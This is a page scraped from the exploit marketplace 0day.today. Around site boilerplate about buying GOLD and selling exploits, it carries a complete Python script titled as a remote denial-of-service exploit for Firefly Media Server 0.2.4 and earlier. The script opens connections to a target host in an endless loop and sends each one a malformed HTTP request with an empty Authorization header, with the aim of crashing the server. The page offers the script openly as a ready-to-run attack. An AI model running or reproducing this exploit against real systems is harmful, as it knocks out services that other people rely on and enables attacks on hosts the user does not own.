0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Firefly Media Server <= 0.2.4 Remote Denial of Service Exploit
============================================================== Firefly Media Server <= 0.2.4 Remote Denial of Service Exploit ============================================================== #!C:\python25\python25.exe """ Advisory : [UPH-07-02] mt-dappd/Firefly media server remote DoS Discovered by nnp http://www.unprotectedhex.com """ import sys import socket import time if len(sys.argv) != 3: sys.exit(-1) kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n Authorization:\r\n\r\n""" host = sys.argv[1] port = sys.argv[2] print '[+] Host : ' + host print '[+] Port : ' + port print "[+] Sending " print kill_msg ctr = 1 while 1: print '[+] Ctr : ' + str(ctr) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, int(port))) s.send(kill_msg) s.close() ctr += 1 # 0day.today [2024-12-24] #